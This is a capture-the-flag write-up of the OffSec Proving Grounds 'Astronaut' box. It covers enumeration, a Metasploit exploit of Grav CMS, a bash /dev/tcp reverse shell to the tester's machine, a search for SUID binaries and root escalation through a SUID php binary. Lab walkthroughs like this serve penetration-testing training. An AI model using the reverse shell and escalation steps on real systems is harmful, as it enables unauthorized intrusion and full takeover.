> For the complete documentation index, see [llms.txt](https://strik3r.gitbook.io/strik3r-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strik3r.gitbook.io/strik3r-blog/ctfs-boxs-challenges/astronaut.md).

# Astronaut

<figure><img src="/files/Z6hQzv5VwEDCC7qzmUg5" alt="" width="563"><figcaption></figcaption></figure>

### TL;DR

I popped open the **Astronaut** box on OffSec Proving Grounds.\
Flow: `nmap` → find HTTP → identify CMS → `searchsploit` → Metasploit exploit → get a session → upgrade to a reverse shell → local enumeration → run `linpeas` → find SUID `php7.4` → use GTFOBins technique → root.

***

## Enumeration

Start with the default reconnaissance:

```bash
nmap -sC -sV -Pn 192.168.122.12 -o nmap.txt
```

<figure><img src="/files/IAD9yOMFfETrprQPOw4I" alt=""><figcaption></figcaption></figure>

Nmap told us: port **80** open. The webroot had only a single directory (looks like a CMS). No obvious version badge.

<figure><img src="/files/IFdJzFBHptzQQ7Gqf2Vc" alt=""><figcaption></figcaption></figure>

So, we go hunting for known exploits:

```bash
searchsploit grav
```

Searchsploit returned a promising Grav CMS exploit

<figure><img src="/files/BjV51G5nAmkdBcBGOEUS" alt=""><figcaption></figcaption></figure>

> Pro tip: When a CMS shows up but no version is obvious, search for common CMS names + “exploit” or use fingerprinting plugins — sometimes the theme or endpoints leak the version.

***

## Get the Foothold

Now, let's try the Metasploit module to exploit this CMS

<figure><img src="/files/G856DXJ4jrVK6XFKMMAo" alt=""><figcaption></figcaption></figure>

and we got our session

<figure><img src="/files/SdNlSnS7pxdxeIMZYXh5" alt=""><figcaption></figcaption></figure>

From the initial session, I wanted a stable reverse shell back to my Kali box.

On Kali, spin up a listener:

```bash
nc -nlvp 9999
```

From the compromised host (via the Metasploit session), drop a reverse bash shell:

```bash
bash -c 'exec bash -i &>/dev/tcp/192.168.45.164/9999 <&1'
```

<figure><img src="/files/jkwuaYvOCTcEgFyJcRC8" alt=""><figcaption></figcaption></figure>

Now we have an interactive shell. Time to LPE.

***

## Local Privilege Escalation (LPE)

#### Manual enumeration

Looking for current application dir

<figure><img src="/files/YIrwDaDyiAbYNa8r72TX" alt=""><figcaption></figcaption></figure>

I checked obvious places for creds and config leaks (e.g., `web.config`, site-specific YAML):

<figure><img src="/files/JVm9o2f6CqdqLaPEJsc5" alt=""><figcaption></figcaption></figure>

Nothing juicy in the `web.config`, but we found `admin.yaml` in the web directory.

<figure><img src="/files/ddhbQPBChTwgtJfcPsF3" alt=""><figcaption></figcaption></figure>

Inside was a bcrypt hash **`$2y$10$dlTNg17RfN4pkRctRm1m2u8cfTHHz7Im.m61AYB9UtLGL2PhlJwe.`**

Nice — hashed credential — but not directly usable for `root`.

***

## Automated enumeration — linpeas to the rescue

I uploaded and ran `linpeas` to speed up LPE discovery

<figure><img src="/files/mTraWYEvJ6nKgAOcYdIE" alt=""><figcaption></figcaption></figure>

`linpeas` flagged multiple interesting items:

* Potential kernel CVEs (worth investigating for risky boxes)
* Several SUID binaries — very interesting

***

## Quick refresher: what is a SUID binary and why it matters?

When you see something like:

```
-rwsr-xr-x 1 root root 12345 Jan 1 12:00 /usr/bin/passwd
```

That `s` indicates the **SUID** bit. Executed by ordinary users, that binary runs **with the file owner's privileges** (often root). This makes SUID binaries valuable for privilege escalation — *if* they are misconfigured or exploitable.

**How to find SUID files:**

```bash
find / -perm -4000 2>/dev/null
```

**Common SUID escalation techniques:**

* PATH hijacking (binary calls other programs without full paths)
* LD\_PRELOAD abuse (if environment isn't sanitized)
* Leveraging legitimate utilities (e.g., `find`, `vim`, `nmap`) that support shell escapes

***

## PHP 7.4 binary with SUID

`linpeas` showed a suspicious `php7.4` binary with the SUID bit. That’s a red flag.

<figure><img src="/files/psKCRaHVpbUgHrs1wMX8" alt=""><figcaption></figcaption></figure>

I checked [GTFOBins ](https://gtfobins.github.io/gtfobins/php/#suid)(the canonical source of abuse patterns for common binaries) and found an entry for `php` under SUID usage.

<figure><img src="/files/xdZ34g1OIOtUG7Pr1tzW" alt=""><figcaption></figcaption></figure>

let’s try it on our box

<figure><img src="/files/dKsIqQAyY4BZdZbVzjlt" alt=""><figcaption></figcaption></figure>

And just like that — root. 🎯

> Hope you enjoyed it 😊
